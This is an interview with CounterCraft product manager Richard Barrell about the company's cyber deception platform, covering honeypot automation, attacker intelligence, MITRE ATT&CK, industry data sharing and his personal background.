“We’re small children at heart: we love taking things apart and putting them back together! Sometimes we can’t put it back together, but that’s all part of the fun.”
A passion for process and a hacker mentality have enabled Product Manager Richard Barrell to take CounterCraft from an MVP to a full spectrum cyber deception platform in a matter of years. Combining active and passive automation, predictive analysis and a focus on human interaction, the platform’s industry-shaping deception technology might just be the Trojan Horse we need to catch-up with threat actors. Historically cyber defenders have been a step behind, but deception is closing the gap.
In our interview with Richard, he explains how the platform is responding to the shifting cyber landscape - and lets us in on some exciting product developments the company has in the pipeline.
How did you end up working in cyber security, and what is it you love about the industry?
I started off working in the finance sector in London way back in the 90s checking firewalls! So I’ve worked in the industry for over 20 years. Security is fascinating because there’s an element of attack and defence, of us and them, of puzzle solving. The industry tends to attract the type of person I find interesting to work with - someone with an enquiring, curious mind. We’re small children at heart: we love taking things apart and putting them back together! Sometimes we can’t put it back together, but that’s all part of the fun. It’s the hacker mentality.
What would you say you’re most passionate about? Apart from the CounterCraft platform, of course!
As boring as it sounds, I love creating new processes (blame it on my background in mechanical engineering). I’ve seen CounterCraft move from a startup to a mature commercial organisation, and a large part of that is due to the fact that we’re getting the processes right.
What’s the coolest thing you’re working on right now?
There are two things. The first is that we’re battering the product to make sure it can withstand all sorts of complicated scenarios. It’s a type of product testing we run to see where the product’s weaknesses are. The second is UX. We’re taking a step back from the platform in order to assess the processes involved so we can streamline the user experience.
Deception is a fairly recent cyber security tool. What technological advances over the last few years have made deception platforms possible?
Deception has existed since the dawn of time, so the method itself isn’t new, but its use in the cyber security industry is. Deception isn’t so much a tool as an approach - a series of technologies. It’s both the technologies themselves and the new ways we can control them that have paved the way for deception in cyber. The increased use of the cloud, for example, means that we can adopt and deploy new technologies quickly, interlink lots of disparate components and command and control devices remotely.
What is it that sets CounterCraft’s platform apart from others in the market?
We are the only platform that truly provides full spectrum deception, which means we can operate outside companies’ network environments. Just as you could find information about a person by rifling through their bin (excuse the metaphor!), attackers will explore “dumpsters” that we can fill with fake information and bury in the cloud, in QR codes, USB keys, etc.
This cloud of misinformation not only sets potential traps away from the data we need to protect, but also gives us vital information about attackers’ TTPs (Tools, Techniques, Procedures). Unlike other platforms, we always use real software and real tools because if the traps aren’t credible, attackers won’t fall for them.
SC Magazine recently recognised our platform as Best Buy because of the focus on quality assurance, functionality and intelligence gathering. That was a proud moment for us!
How has the rise of automation changed the way we’re able to decieve and intercept attackers? And how important is automation to the CounterCraft platform?
Automation is absolutely key to everything we do, but it’s one of the least publicised aspects of our platform. We use a mix of passive and active automation in order to gather and process data on the attacker and interact with them. Our passive automation technology monitors attackers’ movements in the deception environment and extracts key observables (binaries, commands, IP addresses, etc) in a useable format.
Active automation is what we call “deception logic” - we pull on known patterns to automate a response on an if/then framework (“if someone does X, then we can do Y”). We’ve expanded the number and range of “if” scenarios that trigger responses, but we’re now improving complex events correlation technology. Basically that means that it’s no longer just a single event but also a series of events over time that can trigger an automated response. One of the big obstacles to the adoption of deception in the past was the management overheads - both in terms of cost and personnel - as “honeypots” required almost one-to-one management. Our automation technology removes these overheads.
The cyber security industry has spent years trying to get ahead of the attackers. Do you think deception is the tool we’ve been missing?
As defenders it can sometimes feel like we’re always a step behind, playing catch-up with the attackers, but I do think deception is a way of closing the gap. It is not always possible to stop an attack, but being able to figure out who is attacking; how they are acting and what they are looking for is essential data to defend networks, systems and data.
How critical is the data generated by the platform in predicting an attacker’s next move?
Extremely critical! As we discussed in relation to automation, data allows us to understand and increase the probability of predicting an attacker’s next move. Predictive analysis means we can classify and map behaviours and trigger events against existing patterns of known threat actors captured in frameworks like the MITRE ATT&CK™ knowledge base. Frameworks like ATT&CK mean that for the first time, we have a standard way of talking about Indicators of Compromise. Data helps inform successful cyber defence strategies because knowing what an attacker is after will condition our response - they might be looking for data a company isn’t currently protecting, for example.
How vital is collaboration and the sharing of information within the industry if we’re to reduce the number of cyber attacks?
Attackers don’t use custom tools or techniques - they run scripts and have generic approaches, so data sharing platforms like MISP are crucial in formalising and analysing what is happening. John Donne’s classic line, “no man is an island” definitely rings true in cyber. Sharing data within the industry might not reduce the number of attacks, but it improves our response to them.
What do you think is the biggest challenge currently facing the cyber security industry?
The biggest challenge facing the cyber security industry is the external pressure that’s now at play as a result of data protection initiatives like the GDPR. These policies have put enormous pressure on companies as there are now large fines for very small breaches, but our information is everywhere and it’s increasing in value, so it’s getting harder and harder to protect it. That’s why platforms like CounterCraft’s are so important. They allow professionals to automate functions, deploy new tools and get an additional level of protection which can help ameliorate the pressure the industry is facing.
How do you envisage CounterCraft’s platform evolving and responding to the shifting cyber security landscape and wider industry trends such as Industry 4.0 and AI?
Personally I think there’s quite a lot of hype around AI! I might living be in blissful ignorance, but I don’t think it will dramatically change our lives in the short term. We incorporate machine learning into our deception platform, which allows us to spot patterns in data, but I think we’re still a way off from fully-fledged AI.
We have a clear vision for our product, so we’re not strongly influenced by trends outside of our customers’ industries. Industry 4.0 is something that affects our customers in the manufacturing industry, as it increases the attack surface area and therefore the risk of attacks. We’re responding to this by providing a way for companies to deploy deception within an industry environment.
Do you have any more exciting product developments in the pipeline?
The areas we’re focusing on at the moment are the platform’s useability and the number of deception assets it incorporates, for example the ability to detect, alert and react to a series of events. Human interaction is another big trend we’re utilizing in new versions of the platform in order to make sure the deception environment is as credible as possible. We incorporate footprints and tell-tale signs like recent logins and recently used documents in order to make it look like the operator has just stepped away for a cup of tea.
Now tell us, what is a Brit doing in San Sebastian?
I blame my partner! We met during our Erasmus year in Germany. She’s from the Basque Country and persuaded me to move here 17 years ago.
We heard you speak five languages, is that true?
It is true! I speak English, German and Spanish fluently, have an almost-conversational level of French and an improving level of Basque. I also have a few phrases in Greek, Hebrew and Welsh…
You’re just showing off now! Do you think having a team with different cultures, backgrounds and perspectives improves CounterCraft’s product?
More than the variety of cultures in the CounterCraft office, I would say it’s the different age groups that most positively impact the platform. Cyber security is one of the few industries where youth is not a barrier, and the fresh perspectives and ideas that young people bring to the table is crucial in IT.
We have people as young as 19 from very different backgrounds working as part of placement years and apprenticeships, and our flat culture means everyone has an input and all ideas are valued equally, which is what has enabled us to go from strength to strength. In just a few years, we’ve moved from an MVP to a polished, refined, commercial product - and I’m very happy to be part of the journey!